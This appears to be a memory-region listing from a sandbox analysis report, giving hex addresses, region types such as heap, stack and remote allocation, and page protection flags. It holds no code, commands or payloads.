7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
253BA27C000
|
heap
|
page read and write
|
||
|
253BA25D000
|
heap
|
page read and write
|
||
|
253B855E000
|
heap
|
page read and write
|
||
|
2D76000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
17CFEBD7000
|
heap
|
page read and write
|
||
|
253BA870000
|
heap
|
page read and write
|
||
|
253BAD7D000
|
heap
|
page read and write
|
||
|
217EFC8A000
|
heap
|
page read and write
|
||
|
253BA25A000
|
heap
|
page read and write
|
||
|
2489AB70000
|
heap
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
253BAE91000
|
heap
|
page read and write
|
||
|
253B8570000
|
heap
|
page read and write
|
||
|
253BA25E000
|
heap
|
page read and write
|
||
|
1B89AC66000
|
heap
|
page read and write
|
||
|
17CFEC10000
|
heap
|
page read and write
|
||
|
2567E705000
|
heap
|
page read and write
|
||
|
1B89ACC8000
|
heap
|
page read and write
|
||
|
7FF848BD2000
|
trusted library allocation
|
page read and write
|
||
|
1203000
|
trusted library allocation
|
page read and write
|
||
|
5AA45FE000
|
stack
|
page read and write
|
||
|
20FC9037000
|
heap
|
page read and write
|
||
|
17CFCBF0000
|
heap
|
page read and write
|
||
|
253BA25E000
|
heap
|
page read and write
|
||
|
683BBFE000
|
stack
|
page read and write
|
||
|
1200000
|
trusted library allocation
|
page read and write
|
||
|
17CFEBD1000
|
heap
|
page read and write
|
||
|
217EFEC5000
|
heap
|
page read and write
|
||
|
253BAD7D000
|
heap
|
page read and write
|
||
|
7FF848BDD000
|
trusted library allocation
|
page execute and read and write
|
||
|
20FC9047000
|
heap
|
page read and write
|
||
|
20FC8CE0000
|
heap
|
page read and write
|
||
|
253BAEDA000
|
heap
|
page read and write
|
||
|
683BFFF000
|
stack
|
page read and write
|
||
|
2567E790000
|
heap
|
page readonly
|
||
|
5880000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D85000
|
trusted library allocation
|
page read and write
|
||
|
253BA254000
|
heap
|
page read and write
|
||
|
1B89B035000
|
heap
|
page read and write
|
||
|
2567E688000
|
heap
|
page read and write
|
||
|
1B898C8F000
|
heap
|
page read and write
|
||
|
64A0000
|
heap
|
page read and write
|
||
|
3D69000
|
trusted library allocation
|
page read and write
|
||
|
253BAD9E000
|
heap
|
page read and write
|
||
|
20FC9031000
|
heap
|
page read and write
|
||
|
17CFEBD2000
|
heap
|
page read and write
|
||
|
20FC73A5000
|
heap
|
page read and write
|
||
|
253B8533000
|
heap
|
page read and write
|
||
|
253BA860000
|
heap
|
page read and write
|
||
|
1240000
|
trusted library allocation
|
page read and write
|
||
|
17CFCC1F000
|
heap
|
page read and write
|
||
|
AEEC23F000
|
stack
|
page read and write
|
||
|
20FC9131000
|
heap
|
page read and write
|
||
|
253BAECB000
|
heap
|
page read and write
|
||
|
17CFEAD0000
|
heap
|
page read and write
|
||
|
17CFEC1D000
|
heap
|
page read and write
|
||
|
17CFEBB9000
|
heap
|
page read and write
|
||
|
AEEBE7E000
|
stack
|
page read and write
|
||
|
5852000
|
trusted library allocation
|
page read and write
|
||
|
17CFEBE7000
|
heap
|
page read and write
|
||
|
17CFEC0B000
|
heap
|
page read and write
|
||
|
5AA41FE000
|
stack
|
page read and write
|
||
|
253BA260000
|
heap
|
page read and write
|
||
|
256014AF000
|
trusted library allocation
|
page read and write
|
||
|
253BAD7D000
|
heap
|
page read and write
|
||
|
2489B240000
|
heap
|
page execute and read and write
|
||
|
20FC6FC0000
|
heap
|
page read and write
|
||
|
FA9E5FF000
|
unkown
|
page read and write
|
||
|
253BADD5000
|
heap
|
page read and write
|
||
|
253B8502000
|
heap
|
page read and write
|
||
|
2567F339000
|
heap
|
page read and write
|
||
|
20FC8C32000
|
heap
|
page read and write
|
||
|
17CFEBD6000
|
heap
|
page read and write
|
||
|
253B84CC000
|
heap
|
page read and write
|
||
|
2567E620000
|
heap
|
page read and write
|
||
|
2489ECEB000
|
trusted library allocation
|
page read and write
|
||
|
2567E6F2000
|
heap
|
page read and write
|
||
|
253B84AA000
|
heap
|
page read and write
|
||
|
2567E4E0000
|
heap
|
page read and write
|
||
|
2567E640000
|
heap
|
page read and write
|
||
|
F28000
|
heap
|
page read and write
|
||
|
94F42FF000
|
stack
|
page read and write
|
||
|
1B89B16F000
|
heap
|
page read and write
|
||
|
248AB547000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
20FC8CE4000
|
heap
|
page read and write
|
||
|
253BAEB6000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
253BAEC2000
|
heap
|
page read and write
|
||
|
253B9E10000
|
heap
|
page read and write
|
||
|
2B40000
|
trusted library allocation
|
page read and write
|
||
|
253B855E000
|
heap
|
page read and write
|
||
|
253B84BD000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page execute and read and write
|
||
|
248A0AEB000
|
trusted library allocation
|
page read and write
|
||
|
20FC8C25000
|
heap
|
page read and write
|
||
|
2567E7A0000
|
trusted library allocation
|
page read and write
|
||
|
1B89AC8B000
|
heap
|
page read and write
|
||
|
253B8543000
|
heap
|
page read and write
|
||
|
253BA581000
|
heap
|
page read and write
|
||
|
17CFEBF8000
|
heap
|
page read and write
|
||
|
AEEC1B9000
|
stack
|
page read and write
|
||
|
FA9E6FF000
|
stack
|
page read and write
|
||
|
25601978000
|
trusted library allocation
|
page read and write
|
||
|
217EFE50000
|
heap
|
page read and write
|
||
|
253BA266000
|
heap
|
page read and write
|
||
|
2489B0B5000
|
heap
|
page read and write
|
||
|
2489B2D1000
|
trusted library allocation
|
page read and write
|
||
|
2560187D000
|
trusted library allocation
|
page read and write
|
||
|
20FC906B000
|
heap
|
page read and write
|
||
|
2567F2FD000
|
heap
|
page read and write
|
||
|
253BA25D000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
17CFEBE7000
|
heap
|
page read and write
|
||
|
253BACB4000
|
heap
|
page read and write
|
||
|
59F0000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
59A0000
|
trusted library allocation
|
page read and write
|
||
|
253B8506000
|
heap
|
page read and write
|
||
|
1B89ACCA000
|
heap
|
page read and write
|
||
|
2BE0000
|
heap
|
page execute and read and write
|
||
|
17CFCC1F000
|
heap
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
1B89AC74000
|
heap
|
page read and write
|
||
|
20FC70A9000
|
heap
|
page read and write
|
||
|
1B898C60000
|
heap
|
page read and write
|
||
|
253BAE8C000
|
heap
|
page read and write
|
||
|
20FC73A0000
|
heap
|
page read and write
|
||
|
1B898C7B000
|
heap
|
page read and write
|
||
|
2567F25B000
|
heap
|
page read and write
|
||
|
253BACBF000
|
heap
|
page read and write
|
||
|
20FC709A000
|
heap
|
page read and write
|
||
|
2489B11A000
|
heap
|
page read and write
|
||
|
253BA27B000
|
heap
|
page read and write
|
||
|
253BAE81000
|
heap
|
page read and write
|
||
|
253BA5A7000
|
heap
|
page read and write
|
||
|
253B855E000
|
heap
|
page read and write
|
||
|
20FC905B000
|
heap
|
page read and write
|
||
|
1B89AC7C000
|
heap
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
17CFEBEC000
|
heap
|
page read and write
|
||
|
20FC8C32000
|
heap
|
page read and write
|
||
|
7C58AFF000
|
stack
|
page read and write
|
||
|
529D000
|
stack
|
page read and write
|
||
|
256017F4000
|
trusted library allocation
|
page read and write
|
||
|
1B898BB0000
|
heap
|
page read and write
|
||
|
253BA4E0000
|
remote allocation
|
page read and write
|
||
|
AEECE0E000
|
stack
|
page read and write
|
||
|
1B89AC77000
|
heap
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
1B89AC61000
|
heap
|
page read and write
|
||
|
17CFEC38000
|
heap
|
page read and write
|
||
|
253BA636000
|
heap
|
page read and write
|
||
|
AFC9AFF000
|
stack
|
page read and write
|
||
|
253BA6F5000
|
heap
|
page read and write
|
||
|
2489B6AB000
|
trusted library allocation
|
page read and write
|
||
|
2567E800000
|
heap
|
page read and write
|
||
|
253BA4E0000
|
remote allocation
|
page read and write
|
||
|
683C07C000
|
stack
|
page read and write
|
||
|
1B898F80000
|
heap
|
page read and write
|
||
|
1227000
|
trusted library allocation
|
page execute and read and write
|
||
|
24899130000
|
heap
|
page read and write
|
||
|
253BA890000
|
heap
|
page read and write
|
||
|
1B89AC43000
|
heap
|
page read and write
|
||
|
253BA750000
|
heap
|
page read and write
|
||
|
17CFEBE4000
|
heap
|
page read and write
|
||
|
253B8543000
|
heap
|
page read and write
|
||
|
253BA253000
|
heap
|
page read and write
|
||
|
17CFEBB7000
|
heap
|
page read and write
|
||
|
253BA5A8000
|
heap
|
page read and write
|
||
|
20FC8C2F000
|
heap
|
page read and write
|
||
|
253BA690000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
20FC8C32000
|
heap
|
page read and write
|
||
|
1222000
|
trusted library allocation
|
page read and write
|
||
|
248990F0000
|
heap
|
page read and write
|
||
|
2567E66F000
|
heap
|
page read and write
|
||
|
11F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
59B0000
|
trusted library allocation
|
page read and write
|
||
|
1B898E80000
|
heap
|
page read and write
|
||
|
253BAE7E000
|
heap
|
page read and write
|
||
|
25601411000
|
trusted library allocation
|
page read and write
|
||
|
7C588FF000
|
stack
|
page read and write
|
||
|
20FC909A000
|
heap
|
page read and write
|
||
|
128E000
|
stack
|
page read and write
|
||
|
253BA5A5000
|
heap
|
page read and write
|
||
|
12CC000
|
stack
|
page read and write
|
||
|
1B89AB60000
|
heap
|
page read and write
|
||
|
EF7000
|
heap
|
page read and write
|
||
|
24899119000
|
heap
|
page read and write
|
||
|
253BA5DB000
|
heap
|
page read and write
|
||
|
253BA59D000
|
heap
|
page read and write
|
||
|
AEEBD7E000
|
stack
|
page read and write
|
||
|
2567F24E000
|
heap
|
page read and write
|
||
|
5839000
|
stack
|
page read and write
|
||
|
253B8520000
|
heap
|
page read and write
|
||
|
20FC708F000
|
heap
|
page read and write
|
||
|
253B8480000
|
heap
|
page read and write
|
||
|
17CFF0D3000
|
heap
|
page read and write
|
||
|
2489B0B7000
|
heap
|
page read and write
|
||
|
2DA3000
|
trusted library allocation
|
page read and write
|
||
|
253BA266000
|
heap
|
page read and write
|
||
|
17CFEA60000
|
heap
|
page read and write
|
||
|
683C5FE000
|
stack
|
page read and write
|
||
|
253BA280000
|
heap
|
page read and write
|
||
|
217EFE70000
|
heap
|
page read and write
|
||
|
253BA4E0000
|
remote allocation
|
page read and write
|
||
|
2560153A000
|
trusted library allocation
|
page read and write
|
||
|
5AA46FD000
|
stack
|
page read and write
|
||
|
F1B000
|
heap
|
page read and write
|
||
|
FC7000
|
heap
|
page read and write
|
||
|
584E000
|
trusted library allocation
|
page read and write
|
||
|
5AA49FE000
|
stack
|
page read and write
|
||
|
5AA4CFB000
|
stack
|
page read and write
|
||
|
20FC709C000
|
heap
|
page read and write
|
||
|
248A173D000
|
trusted library allocation
|
page read and write
|
||
|
1B89AC9B000
|
heap
|
page read and write
|
||
|
25611411000
|
trusted library allocation
|
page read and write
|
||
|
2567F820000
|
heap
|
page read and write
|
||
|
253B84E8000
|
heap
|
page read and write
|
||
|
253BA255000
|
heap
|
page read and write
|
||
|
40C000
|
remote allocation
|
page execute and read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
2489B227000
|
heap
|
page execute and read and write
|
||
|
7FF848DB2000
|
trusted library allocation
|
page read and write
|
||
|
3D41000
|
trusted library allocation
|
page read and write
|
||
|
20FC953E000
|
heap
|
page read and write
|
||
|
20FC8B51000
|
heap
|
page read and write
|
||
|
2567F245000
|
heap
|
page read and write
|
||
|
1B89AC77000
|
heap
|
page read and write
|
||
|
253B850C000
|
heap
|
page read and write
|
||
|
1B898EC0000
|
heap
|
page read and write
|
||
|
17CFECD0000
|
heap
|
page read and write
|
||
|
F26000
|
heap
|
page read and write
|
||
|
1B89AC62000
|
heap
|
page read and write
|
||
|
2567F240000
|
heap
|
page read and write
|
||
|
2567E780000
|
trusted library allocation
|
page read and write
|
||
|
20FC707B000
|
heap
|
page read and write
|
||
|
17CFCBA0000
|
heap
|
page read and write
|
||
|
253BA624000
|
heap
|
page read and write
|
||
|
253B84CC000
|
heap
|
page read and write
|
||
|
584B000
|
trusted library allocation
|
page read and write
|
||
|
1B898F85000
|
heap
|
page read and write
|
||
|
7FF848C80000
|
trusted library allocation
|
page read and write
|
||
|
AFC98FF000
|
stack
|
page read and write
|
||
|
2567E865000
|
heap
|
page read and write
|
||
|
253B84E8000
|
heap
|
page read and write
|
||
|
2560181A000
|
trusted library allocation
|
page read and write
|
||
|
17CFEC29000
|
heap
|
page read and write
|
||
|
24899157000
|
heap
|
page read and write
|
||
|
5846000
|
trusted library allocation
|
page read and write
|
||
|
2489AAF0000
|
trusted library allocation
|
page read and write
|
||
|
1210000
|
trusted library allocation
|
page read and write
|
||
|
253BA5F3000
|
heap
|
page read and write
|
||
|
EE0000
|
trusted library allocation
|
page read and write
|
||
|
525E000
|
stack
|
page read and write
|
||
|
253B852F000
|
heap
|
page read and write
|
||
|
2489915F000
|
heap
|
page read and write
|
||
|
17CFCC19000
|
heap
|
page read and write
|
||
|
253BAE96000
|
heap
|
page read and write
|
||
|
5A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
17CFEBD0000
|
heap
|
page read and write
|
||
|
1B89AC8B000
|
heap
|
page read and write
|
||
|
253BA581000
|
heap
|
page read and write
|
||
|
1B89AD61000
|
heap
|
page read and write
|
||
|
2567F237000
|
heap
|
page execute and read and write
|
||
|
253BA297000
|
heap
|
page read and write
|
||
|
253BAEA0000
|
heap
|
page read and write
|
||
|
11F4000
|
trusted library allocation
|
page read and write
|
||
|
20FC6FA0000
|
heap
|
page read and write
|
||
|
2489AA60000
|
trusted library allocation
|
page read and write
|
||
|
20FC9030000
|
heap
|
page read and write
|
||
|
20FC9060000
|
heap
|
page read and write
|
||
|
20FC9040000
|
heap
|
page read and write
|
||
|
2567E760000
|
trusted library allocation
|
page read and write
|
||
|
7FF848BD3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2560147E000
|
trusted library allocation
|
page read and write
|
||
|
253BAD6B000
|
heap
|
page read and write
|
||
|
24899161000
|
heap
|
page read and write
|
||
|
253BA8A0000
|
trusted library allocation
|
page read and write
|
||
|
253BAD7D000
|
heap
|
page read and write
|
||
|
24899404000
|
heap
|
page read and write
|
||
|
17CFEBB7000
|
heap
|
page read and write
|
||
|
25601533000
|
trusted library allocation
|
page read and write
|
||
|
20FC9077000
|
heap
|
page read and write
|
||
|
1B89AC90000
|
heap
|
page read and write
|
||
|
1B89AF61000
|
heap
|
page read and write
|
||
|
25601B14000
|
trusted library allocation
|
page read and write
|
||
|
24899400000
|
heap
|
page read and write
|
||
|
17CFEC3A000
|
heap
|
page read and write
|
||
|
7FF848D89000
|
trusted library allocation
|
page read and write
|
||
|
2567F253000
|
heap
|
page read and write
|
||
|
1B898C8F000
|
heap
|
page read and write
|
||
|
2489B63B000
|
trusted library allocation
|
page read and write
|
||
|
2561147E000
|
trusted library allocation
|
page read and write
|
||
|
20FC906B000
|
heap
|
page read and write
|
||
|
2567F360000
|
heap
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
2C2E000
|
stack
|
page read and write
|
||
|
253BAE9E000
|
heap
|
page read and write
|
||
|
253B850A000
|
heap
|
page read and write
|
||
|
253BA540000
|
heap
|
page read and write
|
||
|
20FC9058000
|
heap
|
page read and write
|
||
|
17CFCBE5000
|
heap
|
page read and write
|
||
|
2567E693000
|
heap
|
page read and write
|
||
|
5872000
|
trusted library allocation
|
page read and write
|
||
|
253BA26E000
|
heap
|
page read and write
|
||
|
253BA609000
|
heap
|
page read and write
|
||
|
253B8505000
|
heap
|
page read and write
|
||
|
121A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2567F440000
|
heap
|
page read and write
|
||
|
253BA54A000
|
heap
|
page read and write
|
||
|
24899110000
|
heap
|
page read and write
|
||
|
17CFEC23000
|
heap
|
page read and write
|
||
|
253B8502000
|
heap
|
page read and write
|
||
|
20FC9047000
|
heap
|
page read and write
|
||
|
2BB0000
|
trusted library allocation
|
page read and write
|
||
|
20FC70A9000
|
heap
|
page read and write
|
||
|
20FCAEF0000
|
trusted library allocation
|
page read and write
|
||
|
248AC947000
|
trusted library allocation
|
page read and write
|
||
|
FBA000
|
heap
|
page read and write
|
||
|
585E000
|
trusted library allocation
|
page read and write
|
||
|
17CFEBFB000
|
heap
|
page read and write
|
||
|
20FC709C000
|
heap
|
page read and write
|
||
|
253B8460000
|
heap
|
page read and write
|
||
|
17CFEC0B000
|
heap
|
page read and write
|
||
|
2489E2EB000
|
trusted library allocation
|
page read and write
|
||
|
2489B020000
|
heap
|
page execute and read and write
|
||
|
2D3E000
|
stack
|
page read and write
|
||
|
2567E860000
|
heap
|
page read and write
|
||
|
217EFE90000
|
direct allocation
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
17CFEBB9000
|
heap
|
page read and write
|
||
|
253BA624000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
25601B26000
|
trusted library allocation
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
253BA5A7000
|
heap
|
page read and write
|
||
|
20FC7080000
|
heap
|
page read and write
|
||
|
17CFCC1F000
|
heap
|
page read and write
|
||
|
17CFEBB9000
|
heap
|
page read and write
|
||
|
253B852F000
|
heap
|
page read and write
|
||
|
2489B251000
|
trusted library allocation
|
page read and write
|
||
|
2489B220000
|
heap
|
page execute and read and write
|
||
|
217EFC80000
|
heap
|
page read and write
|
||
|
7FF848BEC000
|
trusted library allocation
|
page read and write
|
||
|
20FC9064000
|
heap
|
page read and write
|
||
|
20FC8B50000
|
heap
|
page read and write
|
||
|
5840000
|
trusted library allocation
|
page read and write
|
||
|
11F0000
|
trusted library allocation
|
page read and write
|
||
|
1B89AC9B000
|
heap
|
page read and write
|
||
|
20FC9130000
|
heap
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
1B89ACA7000
|
heap
|
page read and write
|
||
|
2489B136000
|
heap
|
page read and write
|
||
|
2567E6D5000
|
heap
|
page read and write
|
||
|
17CFCC2C000
|
heap
|
page read and write
|
||
|
1B898EC4000
|
heap
|
page read and write
|
||
|
1B898CA5000
|
heap
|
page read and write
|
||
|
FA9E4FD000
|
stack
|
page read and write
|
||
|
1B89AC43000
|
heap
|
page read and write
|
||
|
2489B142000
|
heap
|
page read and write
|
||
|
1B89AC35000
|
heap
|
page read and write
|
||
|
683C0FE000
|
stack
|
page read and write
|
||
|
20FC9083000
|
heap
|
page read and write
|
||
|
683BE73000
|
stack
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
20FC7080000
|
heap
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
683BEFE000
|
stack
|
page read and write
|
||
|
253B84DA000
|
heap
|
page read and write
|
||
|
253BA278000
|
heap
|
page read and write
|
||
|
7C587FF000
|
stack
|
page read and write
|
||
|
94F47FF000
|
stack
|
page read and write
|
||
|
253BA638000
|
heap
|
page read and write
|
||
|
2560198E000
|
trusted library allocation
|
page read and write
|
||
|
20FC709C000
|
heap
|
page read and write
|
||
|
1220000
|
trusted library allocation
|
page read and write
|
||
|
253BAE7E000
|
heap
|
page read and write
|
||
|
1B898C8F000
|
heap
|
page read and write
|
||
|
253BA5B9000
|
heap
|
page read and write
|
||
|
253BAE8C000
|
heap
|
page read and write
|
||
|
AEEBF7E000
|
stack
|
page read and write
|
||
|
7C58BFF000
|
stack
|
page read and write
|
||
|
17CFCC10000
|
heap
|
page read and write
|
||
|
2567F040000
|
heap
|
page read and write
|
||
|
17CFEBF0000
|
heap
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
253BAE85000
|
heap
|
page read and write
|
||
|
17CFEC04000
|
heap
|
page read and write
|
||
|
2489B040000
|
heap
|
page read and write
|
||
|
17CFEED1000
|
heap
|
page read and write
|
||
|
253BAD7E000
|
heap
|
page read and write
|
||
|
2567E806000
|
heap
|
page read and write
|
||
|
2489AB76000
|
heap
|
page read and write
|
||
|
253BAEA1000
|
heap
|
page read and write
|
||
|
DC0000
|
heap
|
page read and write
|
||
|
17CFEBB7000
|
heap
|
page read and write
|
||
|
5AA47FB000
|
stack
|
page read and write
|
||
|
17CFCC0B000
|
heap
|
page read and write
|
||
|
20FC70A9000
|
heap
|
page read and write
|
||
|
20FC9050000
|
heap
|
page read and write
|
||
|
217EFEC4000
|
heap
|
page read and write
|
||
|
99B000
|
stack
|
page read and write
|
||
|
7FF848BE0000
|
trusted library allocation
|
page read and write
|
||
|
253B84AE000
|
heap
|
page read and write
|
||
|
253BAECB000
|
heap
|
page read and write
|
||
|
683C4FE000
|
stack
|
page read and write
|
||
|
2567E6A9000
|
heap
|
page read and write
|
||
|
5D0D000
|
stack
|
page read and write
|
||
|
253BA5A3000
|
heap
|
page read and write
|
||
|
1B89ACC8000
|
heap
|
page read and write
|
||
|
7FF848BD4000
|
trusted library allocation
|
page read and write
|
||
|
1B898C8B000
|
heap
|
page read and write
|
||
|
253BA277000
|
heap
|
page read and write
|
||
|
253BA5B7000
|
heap
|
page read and write
|
||
|
217EFED0000
|
heap
|
page read and write
|
||
|
253BA609000
|
heap
|
page read and write
|
||
|
253BAD3B000
|
heap
|
page read and write
|
||
|
AEEBFF9000
|
stack
|
page read and write
|
||
|
AFC9CFE000
|
stack
|
page read and write
|
||
|
1B89AC80000
|
heap
|
page read and write
|
||
|
2489B635000
|
trusted library allocation
|
page read and write
|
||
|
AEEBEFD000
|
stack
|
page read and write
|
||
|
253BAE92000
|
heap
|
page read and write
|
||
|
253B8580000
|
heap
|
page read and write
|
||
|
1B89ACC1000
|
heap
|
page read and write
|
||
|
2489C0AB000
|
trusted library allocation
|
page read and write
|
||
|
20FC9044000
|
heap
|
page read and write
|
||
|
2489F6EB000
|
trusted library allocation
|
page read and write
|
||
|
20FC905B000
|
heap
|
page read and write
|
||
|
253BAE99000
|
heap
|
page read and write
|
||
|
253BA279000
|
heap
|
page read and write
|
||
|
20FC9047000
|
heap
|
page read and write
|
||
|
217EFEC0000
|
heap
|
page read and write
|
||
|
248AB2BE000
|
trusted library allocation
|
page read and write
|
||
|
253BA624000
|
heap
|
page read and write
|
||
|
AEEC43C000
|
stack
|
page read and write
|
||
|
253BA609000
|
heap
|
page read and write
|
||
|
253B8543000
|
heap
|
page read and write
|
||
|
AFC99FF000
|
stack
|
page read and write
|
||
|
1B898CB4000
|
heap
|
page read and write
|
||
|
17CFEBFB000
|
heap
|
page read and write
|
||
|
25611420000
|
trusted library allocation
|
page read and write
|
||
|
248A14EB000
|
trusted library allocation
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
253BA54A000
|
heap
|
page read and write
|
||
|
253BA636000
|
heap
|
page read and write
|
||
|
248A00EB000
|
trusted library allocation
|
page read and write
|
||
|
253BA297000
|
heap
|
page read and write
|
||
|
17CFEBE0000
|
heap
|
page read and write
|
||
|
256019B5000
|
trusted library allocation
|
page read and write
|
||
|
253BAD7D000
|
heap
|
page read and write
|
||
|
24899122000
|
heap
|
page read and write
|
||
|
52F3000
|
heap
|
page read and write
|
||
|
1B89AC60000
|
heap
|
page read and write
|
||
|
17CFEBD7000
|
heap
|
page read and write
|
||
|
683BF7E000
|
stack
|
page read and write
|
||
|
253BACBB000
|
heap
|
page read and write
|
||
|
20FC904C000
|
heap
|
page read and write
|
||
|
253BACA0000
|
heap
|
page read and write
|
||
|
649C000
|
stack
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
2489B643000
|
trusted library allocation
|
page read and write
|
||
|
20FC9036000
|
heap
|
page read and write
|
||
|
1B89AC8B000
|
heap
|
page read and write
|
||
|
253BA257000
|
heap
|
page read and write
|
||
|
2489B474000
|
trusted library allocation
|
page read and write
|
||
|
25601579000
|
trusted library allocation
|
page read and write
|
||
|
253BAE10000
|
heap
|
page read and write
|
||
|
253B84AF000
|
heap
|
page read and write
|
||
|
2489B66A000
|
trusted library allocation
|
page read and write
|
||
|
248993E0000
|
heap
|
page read and write
|
||
|
20FC9070000
|
heap
|
page read and write
|
||
|
DC6000
|
heap
|
page read and write
|
||
|
17CFCC44000
|
heap
|
page read and write
|
||
|
1B898C88000
|
heap
|
page read and write
|
||
|
2567F321000
|
heap
|
page read and write
|
||
|
253B85C5000
|
heap
|
page read and write
|
||
|
2489AA40000
|
trusted library allocation
|
page read and write
|
||
|
248ABF47000
|
trusted library allocation
|
page read and write
|
||
|
253BA603000
|
heap
|
page read and write
|
||
|
AEEC0B7000
|
stack
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
253BA26D000
|
heap
|
page read and write
|
||
|
7FF848D81000
|
trusted library allocation
|
page read and write
|
||
|
17CFEFA5000
|
heap
|
page read and write
|
||
|
AEEC33E000
|
stack
|
page read and write
|
||
|
17CFEBB3000
|
heap
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
20FC9037000
|
heap
|
page read and write
|
||
|
EA0000
|
heap
|
page read and write
|
||
|
683C67B000
|
stack
|
page read and write
|
||
|
2567F31C000
|
heap
|
page read and write
|
||
|
253BA6F0000
|
heap
|
page read and write
|
||
|
20FC9330000
|
heap
|
page read and write
|
||
|
20FC9135000
|
heap
|
page read and write
|
||
|
AEECE8D000
|
stack
|
page read and write
|
||
|
F68000
|
heap
|
page read and write
|
||
|
1B89AC70000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
17CFCC18000
|
heap
|
page read and write
|
||
|
253B8533000
|
heap
|
page read and write
|
||
|
2489B069000
|
heap
|
page read and write
|
||
|
2567E5E0000
|
heap
|
page read and write
|
||
|
2567E6D2000
|
heap
|
page read and write
|
||
|
253BAECE000
|
heap
|
page read and write
|
||
|
2B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B89AC77000
|
heap
|
page read and write
|
||
|
7DF4D0570000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B89ACAD000
|
heap
|
page read and write
|
||
|
1B89AC3F000
|
heap
|
page read and write
|
||
|
59C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2567EFE0000
|
heap
|
page execute and read and write
|
||
|
94F46FF000
|
stack
|
page read and write
|
||
|
253BAECB000
|
heap
|
page read and write
|
||
|
253B8521000
|
heap
|
page read and write
|
||
|
2567F32C000
|
heap
|
page read and write
|
||
|
253BAE7E000
|
heap
|
page read and write
|
||
|
2489B0EB000
|
heap
|
page read and write
|
||
|
17CFCC35000
|
heap
|
page read and write
|
||
|
2567E737000
|
heap
|
page read and write
|
||
|
2489B050000
|
heap
|
page read and write
|
||
|
563E000
|
stack
|
page read and write
|
||
|
2B60000
|
trusted library allocation
|
page read and write
|
||
|
253BAE7E000
|
heap
|
page read and write
|
||
|
253B84AB000
|
heap
|
page read and write
|
||
|
AEEC2BE000
|
stack
|
page read and write
|
||
|
5AA40FE000
|
stack
|
page read and write
|
||
|
253BAE89000
|
heap
|
page read and write
|
||
|
2489AEC6000
|
heap
|
page read and write
|
||
|
2489B633000
|
trusted library allocation
|
page read and write
|
||
|
AFC9BFE000
|
stack
|
page read and write
|
||
|
7FF848CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
553E000
|
stack
|
page read and write
|
||
|
1B89CB20000
|
trusted library allocation
|
page read and write
|
||
|
5AA48FD000
|
stack
|
page read and write
|
||
|
7C586FA000
|
stack
|
page read and write
|
||
|
17CFEBDC000
|
heap
|
page read and write
|
||
|
120D000
|
trusted library allocation
|
page execute and read and write
|
||
|
52EA000
|
stack
|
page read and write
|
||
|
253BA581000
|
heap
|
page read and write
|
||
|
573E000
|
stack
|
page read and write
|
||
|
17CFEC38000
|
heap
|
page read and write
|
||
|
1B898C9C000
|
heap
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
17CFEC00000
|
heap
|
page read and write
|
||
|
253BA55A000
|
heap
|
page read and write
|
||
|
17CFCBF8000
|
heap
|
page read and write
|
||
|
2489AB74000
|
heap
|
page read and write
|
||
|
12D0000
|
heap
|
page read and write
|
||
|
AEECF0B000
|
stack
|
page read and write
|
||
|
1B898C80000
|
heap
|
page read and write
|
||
|
20FC70A9000
|
heap
|
page read and write
|
||
|
253B8507000
|
heap
|
page read and write
|
||
|
20FC6F90000
|
heap
|
page read and write
|
||
|
2D74000
|
trusted library allocation
|
page read and write
|
||
|
20FC907D000
|
heap
|
page read and write
|
||
|
2489CAAB000
|
trusted library allocation
|
page read and write
|
||
|
253BA26D000
|
heap
|
page read and write
|
||
|
17C81260000
|
trusted library allocation
|
page read and write
|
||
|
20FC9089000
|
heap
|
page read and write
|
||
|
17CFEBB3000
|
heap
|
page read and write
|
||
|
586D000
|
trusted library allocation
|
page read and write
|
||
|
17CFEBA5000
|
heap
|
page read and write
|
||
|
1B89AC43000
|
heap
|
page read and write
|
||
|
AEEBC7F000
|
stack
|
page read and write
|
||
|
1B89AC94000
|
heap
|
